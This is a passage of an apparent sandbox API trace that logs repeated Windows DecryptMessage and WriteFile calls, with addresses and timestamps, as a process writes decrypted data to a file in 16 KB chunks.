lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.618] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a6404, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a6404, pfQOP=0x0) returned 0x0 [0087.619] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.621] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a6518, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a6518, pfQOP=0x0) returned 0x0 [0087.622] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.622] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a662c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a662c, pfQOP=0x0) returned 0x0 [0087.622] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.622] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a6740, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a6740, pfQOP=0x0) returned 0x0 [0087.622] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.623] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a6854, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a6854, pfQOP=0x0) returned 0x0 [0087.623] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.623] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a6968, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a6968, pfQOP=0x0) returned 0x0 [0087.623] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.624] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a6a7c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a6a7c, pfQOP=0x0) returned 0x0 [0087.624] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.624] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a6b90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a6b90, pfQOP=0x0) returned 0x0 [0087.624] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.624] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a6ca4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a6ca4, pfQOP=0x0) returned 0x0 [0087.625] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.625] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a6db8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a6db8, pfQOP=0x0) returned 0x0 [0087.625] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.633] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a6ecc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a6ecc, pfQOP=0x0) returned 0x0 [0087.634] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.638] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a6fe0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a6fe0, pfQOP=0x0) returned 0x0 [0087.639] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.641] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a70f4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a70f4, pfQOP=0x0) returned 0x0 [0087.642] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.646] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a7208, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a7208, pfQOP=0x0) returned 0x0 [0087.646] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.647] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a731c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a731c, pfQOP=0x0) returned 0x0 [0087.647] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.649] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a7430, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a7430, pfQOP=0x0) returned 0x0 [0087.649] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.649] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a7544, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a7544, pfQOP=0x0) returned 0x0 [0087.649] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.650] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a7658, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a7658, pfQOP=0x0) returned 0x0 [0087.650] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.650] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a776c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a776c, pfQOP=0x0) returned 0x0 [0087.650] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.651] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a7880, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a7880, pfQOP=0x0) returned 0x0 [0087.651] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.651] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a7994, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a7994, pfQOP=0x0) returned 0x0 [0087.651] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.652] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a7aa8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a7aa8, pfQOP=0x0) returned 0x0 [0087.652] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.652] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a7bbc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a7bbc, pfQOP=0x0) returned 0x0 [0087.652] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.653] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a7cd0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a7cd0, pfQOP=0x0) returned 0x0 [0087.653] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.653] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a7de4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a7de4, pfQOP=0x0) returned 0x0 [0087.653] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.653] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a7ef8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a7ef8, pfQOP=0x0) returned 0x0 [0087.654] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.655] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a800c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a800c, pfQOP=0x0) returned 0x0 [0087.655] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.655] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a8120, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a8120, pfQOP=0x0) returned 0x0 [0087.655] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.656] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a8234, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a8234, pfQOP=0x0) returned 0x0 [0087.656] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.656] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a8348, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a8348, pfQOP=0x0) returned 0x0 [0087.656] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.657] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a845c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a845c, pfQOP=0x0) returned 0x0 [0087.657] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.657] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a8570, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a8570, pfQOP=0x0) returned 0x0 [0087.657] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.658] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a8684, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a8684, pfQOP=0x0) returned 0x0 [0087.658] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.658] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a8798, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a8798, pfQOP=0x0) returned 0x0 [0087.658] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.659] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a88ac, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a88ac, pfQOP=0x0) returned 0x0 [0087.659] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.659] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a89c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a89c0, pfQOP=0x0) returned 0x0 [0087.659] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.660] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a8ad4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a8ad4, pfQOP=0x0) returned 0x0 [0087.660] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.660] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a8be8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a8be8, pfQOP=0x0) returned 0x0 [0087.660] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.660] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a8cfc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a8cfc, pfQOP=0x0) returned 0x0 [0087.661] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.661] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a8e10, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a8e10, pfQOP=0x0) returned 0x0 [0087.661] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.661] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a8f24, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a8f24, pfQOP=0x0) returned 0x0 [0087.662] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.739] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a9038, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a9038, pfQOP=0x0) returned 0x0 [0087.739] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.740] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a914c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a914c, pfQOP=0x0) returned 0x0 [0087.741] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.741] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a9260, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a9260, pfQOP=0x0) returned 0x0 [0087.741] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.741] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a9374, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a9374, pfQOP=0x0) returned 0x0 [0087.741] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.742] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a9488, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a9488, pfQOP=0x0) returned 0x0 [0087.742] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.742] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a959c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a959c, pfQOP=0x0) returned 0x0 [0087.742] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.743] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a96b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a96b0, pfQOP=0x0) returned 0x0 [0087.743] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.744] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a97c4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a97c4, pfQOP=0x0) returned 0x0 [0087.744] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.744] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a98d8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a98d8, pfQOP=0x0) returned 0x0 [0087.744] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.745] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a99ec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a99ec, pfQOP=0x0) returned 0x0 [0087.745] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.745] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a9b00, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a9b00, pfQOP=0x0) returned 0x0 [0087.745] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.752] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a9c14, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a9c14, pfQOP=0x0) returned 0x0 [0087.752] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.752] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a9d28, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a9d28, pfQOP=0x0) returned 0x0 [0087.752] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.753] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a9e3c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a9e3c, pfQOP=0x0) returned 0x0 [0087.753] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.753] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a9f50, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a9f50, pfQOP=0x0) returned 0x0 [0087.753] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.753] DecryptMessage (in: phContext=0x376c308, pMessage=0x37aa064, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37aa064, pfQOP=0x0) returned 0x0 [0087.753] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.754] DecryptMessage (in: phContext=0x376c308, pMessage=0x37aa178, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37aa178, pfQOP=0x0) returned 0x0 [0087.754] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.755] DecryptMessage (in: phContext=0x376c308, pMessage=0x37aa28c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37aa28c, pfQOP=0x0) returned 0x0 [0087.755] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.755] DecryptMessage (in: phContext=0x376c308, pMessage=0x37aa3a0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37aa3a0, pfQOP=0x0) returned 0x0 [0087.756] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.756] DecryptMessage (in: phContext=0x376c308, pMessage=0x37aa4b4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37aa4b4, pfQOP=0x0) returned 0x0 [0087.756] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, 